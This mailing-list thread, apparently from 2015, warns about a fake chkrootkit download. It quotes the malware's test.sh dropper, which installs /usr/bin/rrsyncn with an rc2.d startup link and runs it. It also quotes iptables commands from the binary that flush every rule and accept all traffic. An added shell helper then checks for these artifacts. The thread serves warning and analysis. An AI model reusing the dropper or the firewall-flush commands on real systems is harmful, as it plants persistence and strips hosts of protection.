has my 10.1-RELEASE system been compromised

Ian Smith smithi at nimnet.asn.au
Thu Feb 26 15:40:10 UTC 2015


On Wed, 25 Feb 2015 20:55:43 +0000, Christopher Schulte wrote:
 > > On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
 > > 
 > > it felt pretty scammy to me, googling for the "worm" got me to 
 > > rkcheck.org which was registered a few days ago and looks like a 
 > > tampered version of chkrootkit. I hope, nobody installed it anywhere, 
 > > it seems to execute rkcheck/tests/.unit/test.sh which contains
 > > 
 > > #!/bin/bash
 > > 
 > > cp tests/.unit/test /usr/bin/rrsyncn
 > > chmod +x /usr/bin/rrsyncn
 > > rm -fr /etc/rc2.d/S98rsyncn
 > > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
 > > /usr/bin/rrsyncn
 > > exit
 > > 
 > > That doesn't look like something you'd want on your box…
 > 
 > I filed a report with Google about that domain (Google Safe 
 > Browsing), briefly describing what's been recounted here on this 
 > thread.  It seems quite suspicious, agreed.
 > 
 > Has anyone started an analysis of the rrsyncn binary?  The last few 
 > lines of a simple string dump are interesting… take note what looks 
 > to be an IP address of 95.215.44.195.
 > 
 > /bin/sh
 > iptables -X 2> /dev/null
 > iptables -F 2> /dev/null
 > iptables -t nat -F 2> /dev/null
 > iptables -t nat -X 2> /dev/null
 > iptables -t mangle -F 2> /dev/null
 > iptables -t mangle -X 2> /dev/null
 > iptables -P INPUT ACCEPT 2> /dev/null
 > iptables -P FORWARD ACCEPT 2> /dev/null
 > iptables -P OUTPUT ACCEPT 2> /dev/null
 > udevd
 > 95.215.44.195
 > ;*3$"
 > 
 > > Cheers,
 > > 
 > > Philip
 > 
 > Chris

Seeing as no one's mentioned it yet .. if your (linux) box were running 
iptables - a reasonable assumption - then running those commands would 
remove and flush all your rules, leaving you with a firewall that 
accepted everything, as good as no firewall at all.  And then .. ?

At least FreeBSD isn't the lowest hanging fruit for these monkeys ..

cheers, Ian
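As an added defender-side check, not code from this thread, from rkcheck.org or from chkrootkit: a POSIX shell helper that looks for the two paths the quoted test.sh drops and classifies `iptables -S` output as "open" when it matches the no-rules, all-ACCEPT state the quoted flush sequence leaves behind. The ROOT argument is an assumption of this example so the file check can be run against a mounted image or a constructed test tree rather than only the live system.

```shell
#!/bin/sh
# Added audit helper: not code from the thread, rkcheck.org or chkrootkit.
# Looks for the files the quoted test.sh drops and classifies `iptables -S`
# output as "open" when it shows the no-rules, all-ACCEPT state that the
# quoted iptables -F/-X/-P sequence leaves behind. ROOT (assumed) lets the
# file check run against a mounted image or a constructed test tree.

RRSYNCN_PATHS="/usr/bin/rrsyncn /etc/rc2.d/S98rsyncn"  # from the quoted test.sh

# Print each artifact present under ROOT (default: the live system).
# Returns 1 if anything was found, 0 if the host looks clean.
check_rrsyncn_artifacts() {
    root="${1:-}"
    found=0
    for p in $RRSYNCN_PATHS; do
        # -L catches the S98rsyncn symlink even when it dangles.
        if [ -e "$root$p" ] || [ -L "$root$p" ]; then
            echo "FOUND: $root$p"
            found=1
        fi
    done
    return "$found"
}

# Read `iptables -S` output on stdin; print "open" when all three chain
# policies are ACCEPT and no -A rules remain, otherwise "filtered".
firewall_state_from_iptables_s() {
    accept=0
    rules=0
    while read -r line; do
        case "$line" in
            "-P INPUT ACCEPT"|"-P FORWARD ACCEPT"|"-P OUTPUT ACCEPT")
                accept=$((accept + 1)) ;;
            "-A "*) rules=$((rules + 1)) ;;
        esac
    done
    if [ "$accept" -eq 3 ] && [ "$rules" -eq 0 ]; then
        echo open
    else
        echo filtered
    fi
}

# Live run (needs root for iptables): sh audit.sh --live
if [ "${1:-}" = "--live" ]; then
    check_rrsyncn_artifacts "" || echo "rrsyncn persistence artifacts present"
    iptables -S 2>/dev/null | firewall_state_from_iptables_s
fi
```

A host that legitimately runs with no iptables rules will also report "open", so treat that result as a prompt to compare against the expected ruleset rather than as proof of compromise on its own.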
